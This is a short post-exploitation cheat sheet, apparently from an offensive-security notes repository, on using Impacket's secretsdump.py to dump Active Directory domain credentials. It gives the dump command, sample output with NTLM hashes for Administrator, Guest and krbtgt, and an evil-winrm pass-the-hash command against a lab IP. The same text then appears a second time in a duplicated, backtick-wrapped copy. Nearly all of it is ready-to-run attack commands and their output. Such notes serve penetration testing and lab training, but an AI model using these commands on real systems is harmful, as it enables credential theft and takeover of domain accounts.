killchain-compendium/post_exploitation/docs/secretsdump.md

# Secretsdump

Mimikatz for the network!
* Part of Impacket

## Usage
* IP and domain controller name only.
```sh
secretsdump.py -just-dc -no-pass <dc-name>\$@<dc-ip>
```

* Dumped domain credentials are the result. Example:
```sh
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3f3ef89114fb063e3d7fc23c20f65568:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2179ebfa86eb0e3cbab2bd58f2c946f5:::
```

* NTLM hashes of this dump can be used to feed `evil-winrm`. Example from above as Administrator + Hash
```sh 
evil-winrm.rb -i 10.10.15.3 -u Administrator -H 3f3ef89114fb063e3d7fc23c20f65568
```
bump 2021-08-28 00:13:16 +02:00			`# Secretsdump`

			`Mimikatz for the network!`
			`* Part of Impacket`

			`## Usage`
			`* IP and domain controller name only.`
			```sh
			`secretsdump.py -just-dc -no-pass <dc-name>\$@<dc-ip>`
			```

			`* Dumped domain credentials are the result. Example:`
			```sh
			`Administrator:500:aad3b435b51404eeaad3b435b51404ee:3f3ef89114fb063e3d7fc23c20f65568:::`
			`Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::`
			`krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2179ebfa86eb0e3cbab2bd58f2c946f5:::`
			```

			* NTLM hashes of this dump can be used to feed `evil-winrm`. Example from above as Administrator + Hash
			```sh
			`evil-winrm.rb -i 10.10.15.3 -u Administrator -H 3f3ef89114fb063e3d7fc23c20f65568`
			```